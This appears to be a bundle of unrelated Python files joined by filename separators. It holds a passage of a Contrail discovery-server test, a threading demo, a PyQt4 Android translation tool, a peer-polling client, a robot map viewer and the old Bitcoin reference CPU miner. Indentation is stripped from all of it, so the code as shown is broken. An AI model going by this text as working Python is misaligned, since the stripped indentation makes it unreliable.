response_2 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="2.2.2.2",port="123")
response_3 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="3.3.3.3",port="123")
sleep(5)
obj_1 = Process(target=publish_request)
obj_1.start()
sleep(1)
if self.ds_obj.get_service_status(ds_ip,\
service_tuple=("1.1.1.1","TEST_PUB")) == "up" \
and self.ds_obj.get_service_status(ds_ip,\
service_tuple=("2.2.2.2","TEST_PUB")) == "up" \
and self.ds_obj.get_service_status(ds_ip,\
service_tuple=("3.3.3.3","TEST_PUB")) == "up":
self.logger.info("#### All publishers have registered to discovery server successfully.###")
else:
self.logger.error("\n#### Either or all Publishers have not registered to discovery server.\n \
No sense of proceeding the test case. Exiting. ###")
self.ds_obj.modify_discovery_conf_file_params( 'del_policy',\
publisher_type="TEST_PUB")
obj_1.terminate()
result = False
assert result
self.logger.info("\n#### Sending 3 synthetic subscribe requests with instance value 2\n \
to subscribe to Publisher *TEST_PUB* ###")
self.ds_obj.subscribe_service_from_discovery(ds_ip,service="TEST_PUB",\
instances="2",client_id="1.1.1.1:TestClient",\
remote_addr= "1.1.1.1", client_type= "TestClient")
self.ds_obj.subscribe_service_from_discovery(ds_ip,service="TEST_PUB",\
instances="2",client_id="2.2.2.2:TestClient",\
remote_addr= "2.2.2.2", client_type= "TestClient")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="TEST_PUB",\
instances="2",client_id="3.3.3.3:TestClient",\
remote_addr= "3.3.3.3", client_type= "TestClient")
self.logger.debug("#### Verifying the in use count of publishers are subscribe request ###")
p1_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("1.1.1.1","TEST_PUB"))
p2_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("2.2.2.2","TEST_PUB"))
p3_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("3.3.3.3","TEST_PUB"))
publisher_in_use_list=[p1_in_use_count,p2_in_use_count,p3_in_use_count]
if sum(publisher_in_use_list) == 6 and 0 in publisher_in_use_list:
self.logger.info("\n#### Clients subscribed successfully to publishers\n \
and policy as *fixed* working as expected ##")
else:
self.logger.error("#### Subscription not as expected. The in use list looks like %s ##"\
% publisher_in_use_list)
result = False
self.logger.debug("\n#### Stopping one of the in use Publisher for extended period\n \
(> 15 seconds) to decrease it's priority ##")
obj_1.terminate()
index_first_pub_used = publisher_in_use_list.index(3)
def new_publish_request():
for i in range(0,100):
if index_first_pub_used == 0:
response_2 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="2.2.2.2", port ="123")
response_3 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="3.3.3.3", port ="123")
elif index_first_pub_used == 1:
response_1 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="1.1.1.1", port ="123")
response_3 = self.ds_obj.publish_service_to_discovery(ds_ip,\
service="TEST_PUB",ip="3.3.3.3", port ="123")
sleep(5)
new_obj=Process(target =new_publish_request)
new_obj.start()
self.logger.debug("#### Waiting for 60 seconds so that all subscriptions are lost ##")
sleep(60)
self.logger.debug("\n#### Again starting the stopped publishers\n \
and hoping that its priority has been reduced and it will not be used by the clients any more##")
new_obj.terminate()
obj_2 = Process(target=publish_request)
obj_2.start()
sleep(1)
self.logger.info("\n#### Again sending 3 synthetic subscribe requests\n \
with instance value 2 to subscribe to Publisher *TEST_PUB* ###")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="TEST_PUB",\
instances="2",client_id="1.1.1.1:TestClient",\
remote_addr= "1.1.1.1",client_type= "TestClient")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="TEST_PUB",\
instances="2",client_id="2.2.2.2:TestClient",\
remote_addr= "2.2.2.2",client_type= "TestClient")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="TEST_PUB",\
instances="2",client_id="3.3.3.3:TestClient",\
remote_addr= "3.3.3.3",client_type= "TestClient")
self.logger.debug("#### Verifying the in use count of publishers are subscribe request ###")
p1_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("1.1.1.1","TEST_PUB"))
p2_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("2.2.2.2","TEST_PUB"))
p3_in_use_count = self.ds_obj.get_service_in_use(ds_ip,("3.3.3.3","TEST_PUB"))
publisher_in_use_list=[p1_in_use_count,p2_in_use_count,p3_in_use_count]
if sum(publisher_in_use_list) == 6 and publisher_in_use_list.index(index_first_pub_used) == 0:
self.logger.info("\n#### Clients subscribed successfully to publishers\n \
and policy as *fixed* working as expected ##")
self.logger.info("\n#### Clients not subscribed to publisher \n \
which went down for time more than extended period as it's priority has been decreased ##")
else:
self.logger.error("#### Subscription not as expected. The in use list looks like %s ##"\
% publisher_in_use_list)
self.logger.error("\n#### Clients might have subscribed to publisher which went down.\n \
This means priority of that publisher was not decreased ##")
result = False
obj_2.terminate()
self.logger.info("#### Deleting the policy configurations from .conf file ##")
assert self.ds_obj.modify_discovery_conf_file_params( 'del_policy',\
publisher_type="TEST_PUB")
self.logger.debug("#### Waiting for dummy Publish and subscribe requests to expire ##")
sleep(30)
self.ds_obj.cleanup_service_from_discovery(ds_ip)
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_do_not_affect_other_dns_subscriptions(self):
'''
This test case is specifically written to automate Bug
"#1548638 : [Discovery-Rel3.0-Centos-1]: All clients re-subscribe
to a different publisher when a rule is added which was supposed
to affect only 1 subscriber (No Auto load balance) "
Steps:
1. Search for the DNS-Server to which vrouter agents are subscribed to.
2. Create a rule entry for nay one of the vrouter agent and Publisher.
3. Again search for DNS-Server to which vrouter agent is subscribed to
and match it to values before creating rule.
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of DNS servers running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("dns-server", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("# Finding the subscriptions of all vrouter-agents to DNS-server before creating a rule# ")
all_vrouter_pub_IPs_bfr_rule = []
for i in range(0,len(self.inputs.compute_control_ips)):
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[i],\
"contrail-vrouter-agent:0"),service="dns-server")
instances_allocated = len(client_subscribed_service_id)
service_IPs = []
for k in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[k])
service_IPs.append(service_endpoint[0][0])
self.logger.debug("Contrail-vrouter-agent running on %s is subscribed to DNS-server running at %s" \
% (self.inputs.compute_control_ips[i],service_IPs))
all_vrouter_pub_IPs_bfr_rule.append(service_IPs)
self.logger.info("## Creating a rule for 1 of the vrouter-agent subscriber")
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0], 'dns-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
self.logger.info("#### Waiting for 30 seconds so that TTL expiry for all subscriptions to happens###")
sleep (30)
self.logger.info("# Finding the subscriptions of all vrouter-agents to DNS-server after creating a rule# ")
all_vrouter_pub_IPs_aftr_rule = []
for i in range(0,len(self.inputs.compute_control_ips)):
client_subscribed_service_id=self.ds_obj.get_subscribed_service_id(ds_ip,\
client=(self.inputs.compute_control_ips[i],\
"contrail-vrouter-agent:0"),service="dns-server")
instances_allocated = len(client_subscribed_service_id)
service_IPs = []
for k in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[k])
service_IPs.append(service_endpoint[0][0])
self.logger.debug("Contrail-vrouter-agent running on %s is subscribed to DNS-server running at %s" \
% (self.inputs.compute_control_ips[i],service_IPs))
all_vrouter_pub_IPs_aftr_rule.append(service_IPs)
if all_vrouter_pub_IPs_aftr_rule[0][0] == self.inputs.bgp_control_ips[0] \
and len(all_vrouter_pub_IPs_aftr_rule[0]) == 1:
self.logger.debug("The rule has worked properly")
for i in range(1,len(all_vrouter_pub_IPs_aftr_rule)):
if all_vrouter_pub_IPs_aftr_rule[i] == all_vrouter_pub_IPs_bfr_rule[i]:
self.logger.debug("No change has happened in other subscriptions due to rule.")
else:
result = False
self.logger.error("\n The publisher assigned to contrail-vrouter\n \
running on %s were %s and has changed to %s"\
% (self.inputs.compute_control_ips[i],\
all_vrouter_pub_IPs_bfr_rule[i],all_vrouter_pub_IPs_aftr_rule[i]))
else:
self.logger.error("Rule has not worked as expected")
self.logger.debug("Subscriber %s has subscribed to %s Publisher instead of subscribing only to %s"\
% (self.inputs.compute_control_ips[i],\
all_vrouter_pub_IPs_aftr_rule[0],self.inputs.bgp_control_ips[0]) )
result = False
self.logger.info("# Deleting the rule after the test is complete # ")
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0], 'dns-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
assert result, "Test case failed due to some error. Please refer to logs"
# end TestDiscoveryFixture
|
multiThreading.py
|
import time
import threading
def calc_sqr(ar):
for i in ar:
time.sleep(0.2)
print("square:", i*i)
def calc_cube(ar):
for i in ar:
time.sleep(0.2)
print("cube:", i*i*i)
ar = [2, 4, 8, 9]
t = time.time()
t1 = threading.Thread(target=calc_sqr, args=(ar,))
t2 = threading.Thread(target=calc_cube, args=(ar,))
t1.start()
t2.start()
t1.join()
t2.join()
print("done in", time.time()-t)
|
AAT.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'AAT.ui'
#
# Created: Wed Sep 09 12:06:25 2015
# by: PyQt4 UI code generator 4.9.6
#
# WARNING! All changes made in this file will be lost!
'''
* Copyright (C) 2015 Francisco Javier <https://mx.linkedin.com/in/fcojavierpena>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
'''
import os
import threading
import warnings
from PyQt4 import QtCore, QtGui
from PyQt4.QtGui import QFileDialog
import goslate
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.pool import StaticPool
from Export import ExportData
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(QtGui.QWidget):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(500, 273)
MainWindow.setFixedSize(500, 273)
MainWindow.setStyleSheet(_fromUtf8("QWidget#centralwidget{background-color: qlineargradient(spread:pad, x1:1, y1:1, x2:1, y2:0, stop:0 rgba(186, 186, 186, 255), stop:0.781095 rgba(235, 235, 235, 255));}\n"
"\n"
"QToolButton, QToolButton:pressed{\n"
"\n"
"background-color:transparent;\n"
"border:none;\n"
"color: rgb(156, 156, 156);\n"
"\n"
"}\n"
"\n"
"QToolButton:checked, QToolButton:pressed{\n"
"\n"
"background-color:rgb(219,218,206);\n"
"border: 1px solid rgb(255, 255, 255);\n"
"\n"
"}\n"
"\n"
"QToolButton:hover{\n"
"\n"
"background-color:rgb(89,209,171);\n"
"\n"
"}\n"
"\n"
"\n"
"QToolButton:checked:hover{\n"
"\n"
"background-color:rgb(219,218,206);\n"
"\n"
"}\n"
"\n"
" QPushButton {\n"
"font: 75 14pt \"Segoe UI Light\";\n"
" background-color: rgb(0, 150, 136);\n"
" color: rgb(255, 255, 255);\n"
" border-width: 2px;\n"
" border-radius: 10px;\n"
" border-color: rgb(0, 150, 136);\n"
" font: bold 16px;\n"
" min-width: 10em;\n"
" padding: 6px;\n"
" }\n"
" QPushButton:pressed {\n"
" background-color: rgb(77,182, 172);\n"
" }\n"
"\n"
"QLineEdit {\n"
"\n"
" border-style: solid;\n"
" border: 2px solid gray;\n"
" border-radius: 8px;\n"
" \n"
" color: rgb(159, 159, 159);\n"
" font: 75 14pt \"Segoe UI Light\";\n"
" border-width: 2px;\n"
" border-radius: 10px;\n"
" min-width: 10em;\n"
" padding: 6px;\n"
"\n"
" }\n"
"\n"
"QLabel{\n"
"font: 63 15pt \"Segoe UI Light\";\n"
"color: rgb(156, 156, 156);\n"
"}\n"
"\n"
"QGroupBox{\n"
"color: rgb(156, 156, 156);\n"
"}\n"
"\n"
"QProgressBar {\n"
" border: 2px solid grey;\n"
" border-radius: 5px;\n"
" text-align: center;\n"
" }\n"
"\n"
" QProgressBar::chunk {\n"
" background-color: #05B8CC;\n"
"background-color: rgb(0, 150, 136);\n"
" width: 20px;\n"
" }\n"
"QCheckBox{\n"
"font: 63 15pt \"Segoe UI Light\";\n"
"color: rgb(0, 150, 136);\n"
"}\n"
"\n"
"\n"
"/* QComboBox STYLE */\n"
"\n"
"QComboBox {\n"
" border: 1px solid gray;\n"
" border-radius: 3px;\n"
" padding: 1px 18px 1px 3px;\n"
" min-width: 5em;\n"
" height: 30px;\n"
" font: 63 15pt \"Segoe UI Light\";\n"
"}\n"
"\n"
"QComboBox:editable {\n"
" background: white;\n"
"}\n"
"\n"
"QComboBox:!editable, QComboBox::drop-down:editable {\n"
" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n"
" stop: 0 #E1E1E1, stop: 0.4 #DDDDDD,\n"
" stop: 0.5 #D8D8D8, stop: 1.0 #D3D3D3);\n"
"}\n"
"\n"
"/* QComboBox gets the \"on\" state when the popup is open */\n"
"QComboBox:!editable:on, QComboBox::drop-down:editable:on {\n"
" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n"
" stop: 0 #D3D3D3, stop: 0.4 #D8D8D8,\n"
" stop: 0.5 #DDDDDD, stop: 1.0 #E1E1E1);\n"
"}\n"
"\n"
"QComboBox:on { /* shift the text when the popup opens */\n"
" padding-top: 3px;\n"
" padding-left: 4px;\n"
"}\n"
"\n"
"QComboBox::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 15px;\n"
"\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
"}\n"
"\n"
"\n"
"QComboBox::down-arrow:on { /* shift the arrow when popup is open */\n"
" top: 1px;\n"
" left: 1px;\n"
"}"))
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.btImportRes = QtGui.QPushButton(self.centralwidget)
self.btImportRes.setGeometry(QtCore.QRect(260, 120, 222, 51))
self.btImportRes.setStyleSheet(_fromUtf8(" QPushButton:pressed {\n"
" background-color: rgb(0,151, 167);\n"
" }\n"
" QPushButton{\n"
"background-color: rgb(1, 87, 155);\n"
"}\n"
""))
self.btImportRes.setObjectName(_fromUtf8("btImportRes"))
self.lbTo = QtGui.QLabel(self.centralwidget)
self.lbTo.setGeometry(QtCore.QRect(30, 130, 131, 21))
self.lbTo.setObjectName(_fromUtf8("lbTo"))
self.btExportFile = QtGui.QPushButton(self.centralwidget)
self.btExportFile.setGeometry(QtCore.QRect(260, 190, 222, 51))
self.btExportFile.setStyleSheet(_fromUtf8("\n"
" QPushButton:pressed {\n"
" background-color: rgb(0,150, 136);\n"
" }\n"
" QPushButton{\n"
"background-color: rgb(0, 191, 165);\n"
"}\n"
"\n"
""))
self.btExportFile.setObjectName(_fromUtf8("btExportFile"))
self.lbProcess = QtGui.QLabel(self.centralwidget)
self.lbProcess.setGeometry(QtCore.QRect(10, 10, 481, 91))
self.lbProcess.setStyleSheet(_fromUtf8(" border: 2px solid #B2DFDB;"))
self.lbProcess.setTextFormat(QtCore.Qt.AutoText)
self.lbProcess.setAlignment(QtCore.Qt.AlignCenter)
self.lbProcess.setWordWrap(True)
self.lbProcess.setObjectName(_fromUtf8("lbProcess"))
self.comboTo = QtGui.QComboBox(self.centralwidget)
self.comboTo.setGeometry(QtCore.QRect(20, 160, 221, 51))
self.comboTo.setObjectName(_fromUtf8("comboTo"))
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Android App Translate", None))
self.btImportRes.setText(_translate("MainWindow", "Import string resource", None))
self.lbTo.setText(_translate("MainWindow", "Translate to", None))
self.btExportFile.setText(_translate("MainWindow", "Export", None))
self.lbProcess.setText(_translate("MainWindow", "Android Application Translate", None))
#QtCore.QObject.connect(self.comboFrom, QtCore.SIGNAL("currentIndexChanged(int)"), self.onItemFromSelected)
QtCore.QObject.connect(self.comboTo, QtCore.SIGNAL("currentIndexChanged(int)"), self.onItemToSelected)
QtCore.QObject.connect(self.btExportFile, QtCore.SIGNAL("clicked()"), self.exportFile)
QtCore.QObject.connect(self.btImportRes, QtCore.SIGNAL("clicked()"), self.selectResourceString)
dataLanguages = {}
fromKey = ""
toKey = ""
def onItemToSelected(self, item):
self.toKey = ""
selectedLanguage = self.comboTo.currentText()
self.toKey = self.dataLanguages[str(selectedLanguage)]
def onItemFromSelected(self, item):
self.fromKey = ""
selectedLanguage = self.comboFrom.currentText()
self.fromKey = self.dataLanguages[str(selectedLanguage)]
def selectResourceString(self):
in_path = QtGui.QFileDialog.getOpenFileName(self, u'Select string.xml resource', '')
fileName, fileExtension = os.path.splitext(str(in_path))
if fileExtension != '':
if str(fileExtension) != '.xml':
QtGui.QMessageBox.critical(self, u'System', u' Wrong file, the file should contain the XML extension.',QtGui.QMessageBox.Ok)
else:
self.lbProcess.setText(in_path)
self.btExportFile.setEnabled(False)
e = ImportData()
t = threading.Thread(target=e.importFile, args=(self, in_path, self.toKey), name='ServiceImport')
t.start()
def exportFile(self):
self.importEvo = True
engine = create_engine('sqlite:///data.sqlite',connect_args={'check_same_thread':True}, poolclass=StaticPool)
session = sessionmaker()
session.configure(bind=engine)
s = session()
language = ""
try:
ln = s.query(DataAccess.DataString.language_translation).first()
language = ln[0]
if language == '':
language = self.toKey
except Exception as e:
language = self.toKey
fileName = QFileDialog.getSaveFileName(self, 'Save as','strings-%s'%(language), selectedFilter='*.xml')
if fileName:
e = ExportData()
t = threading.Thread(target=e.exportToXMLFileString, args=(self, fileName, self.toKey), name='ServiceExportToXML')
t.start()
def loadLanguage(self):
gs = goslate.Goslate()
print gs.get_languages()
data = gs.get_languages()
count = 0
for string in data:
key = json.dumps(string)
key = key.split('"')
key = key[1]
language = gs.get_languages()[key]
self.dataLanguages[language] = key
#print count, language
#self.comboFrom.setItemText(count, _translate("MainWindow", key, None))
#self.comboFrom.addItem(_fromUtf8(language))
#self.comboTo.setItemText(count, _translate("MainWindow", key, None))
self.comboTo.addItem(_fromUtf8(language))
count += 1
import json
import DataAccess
from Import import ImportData
from xml.dom import minidom
import wx
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
sits = QtGui.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(sits)
ui.loadLanguage()
sits.show()
sys.exit(app.exec_())
|
client.py
|
# Author: Ernests
import requests
import time
import json
import threading
from sensible.database import insertOtherData
def runClient(lock, otherData, clientLog, deviceAddress, addresses, **kwargs):
threading.Thread(target=clientLoop, args=(lock, otherData, clientLog, deviceAddress, addresses)).start()
def clientLoop(lock, otherData, clientLog, deviceAddress, addresses):
peersLastRequested = {}
session = requests.Session()
session.trust_env = False
while True:
# Can try put each of these requests in a separate thread.
for peer in addresses:
try:
timePreviousRequest = peersLastRequested[peer] if peer in peersLastRequested.keys() else 0
msg = { "lastRequest": timePreviousRequest }
msg = json.dumps(msg)
# perhaps a lock here
timeCurrentRequest = time.time()
# r = session.prepare_request(requests.Request('POST', peer, data=msg, timeout=2))
r = session.post(peer, data=msg, timeout=2)
clientLog.append(f'Sent to: {peer}, code {r.status_code}')
otherData = storeData(deviceAddress, peer, otherData, r.json())
peersLastRequested[peer] = timeCurrentRequest
except requests.exceptions.RequestException as e:
clientLog.append(f'Connection failed to: {peer}')
time.sleep(2)
def storeData(deviceAddress, peer, collected, new):
if peer not in collected:
collected[peer] = {}
for i in new:
if i in collected[peer]:
collected[peer][i].extend(new[i])
else:
collected[peer][i] = new[i]
for data in new[i]:
insertOtherData(deviceAddress, peer, i, data['data'], data['timestamp'])
return collected
|
show_map.py
|
from PIL import Image
import threading
import matplotlib
import time
import numpy as np
from logging import getLogger
logger = getLogger('show_map')
class ShowMap:
"""
Class that implements the ShowMap object.
"""
def __init__(self, grid, show_gui = True, save_map_time = 5, name = 'map.png'):
"""
Instantiates a ShowMap.
:param grid: The grid of the environment with certainty values.
:type grid: 2D Numpy array
:param show_gui: True if we want to show the gui, False otherwise.
:type show_gui: boolean
:param save_map_time: Delay between each save of the map.
:type save_map_time: float
:param name: Name of the map file.
:type name: string
"""
if not show_gui:
matplotlib.use('Agg')
import matplotlib.pyplot as plt
self.__save_map_time = save_map_time
self.__name = name
self.__image = Image.fromarray(np.transpose(grid) * 255)
w, h = self.__image.size
plt.rcParams['toolbar'] = 'None'
self.__fig, self.__ax = plt.subplots(1, 1)
self.__fig.suptitle(self.__name)
self.__ax.set_xticks([])
self.__ax.set_yticks([])
self.__implot = self.__ax.imshow(self.__image)
plt.show(block=False)
self.__fig.canvas.draw()
self.__save()
self.__start_time = time.time()
def update(self, map_to_display, robot_cell, frontiers = None, forces = None, path = None):
"""
Function that updates the gui.
:param map_to_display: The map of the environment to display.
:type map_to_display: Map
:param robot_cell: The cell of the robot in the grid.
:type robot_cell: Position
:param frontiers: The frontiers.
:type frontiers: A list of Position objects.
:param forces: The forces.
:type forces: A dictionary of dictionaries representing vectors.
:param path: The path.
:type path: A list of Position objects.
"""
import matplotlib.pyplot as plt
plt.pause(0.02)
grid = np.matrix(map_to_display.grid)
for x in range(map_to_display.grid_width):
for y in range(map_to_display.grid_height):
value = grid[x, y]
self.__image.putpixel((x, map_to_display.grid_height - 1 - y), abs(255 - (value * 255)))
self.__ax.clear()
self.__implot = self.__ax.imshow(self.__image)
self.__ax.set_xticks([])
self.__ax.set_yticks([])
self.__ax.plot(robot_cell.x, map_to_display.grid_height - 1 - robot_cell.y, 'rs', markersize=3)
if forces != None:
y = map_to_display.grid_height - 1 - robot_cell.y
if forces['rep_force'] != None:
self.__ax.arrow(robot_cell.x, y, forces['rep_force']['x'], -forces['rep_force']['y'], head_width=1, head_length=2, fc='r', ec='r')
if forces['attr_force'] != None:
self.__ax.arrow(robot_cell.x, y, forces['attr_force']['x'], -forces['attr_force']['y'], head_width=1, head_length=2, fc='g', ec='g')
if forces['gen_force'] != None:
self.__ax.arrow(robot_cell.x, y, forces['gen_force']['x'], -forces['gen_force']['y'], head_width=1, head_length=2, fc='m', ec='m')
if path != None:
for i in range(len(path)):
self.__ax.plot(path[i].x, map_to_display.grid_height - 1 - path[i].y, 'bh', markersize=4 if i < len(path) - 1 else 8)
if frontiers != None:
index = 0
for frontier in frontiers:
for point in frontier:
color = ['gh', 'ch', 'mh', 'yh', 'kh']
self.__ax.plot(point.x, map_to_display.grid_height - 1 - point.y, color[index % 5], markersize=1)
index += 1
self.__fig.canvas.draw()
elapsed_time = time.time() - self.__start_time
if elapsed_time >= self.__save_map_time:
self.__save()
self.t = threading.Thread(target=self.__save, args=())
self.t.start()
self.__start_time = time.time()
def __save(self):
"""
Function that saves the map to a file.
"""
data = np.fromstring(self.__fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
data = data.reshape(self.__fig.canvas.get_width_height()[::-1] + (3,))
img = Image.fromarray(data)
img.convert('RGB').save(self.__name, "PNG")
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 12221
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
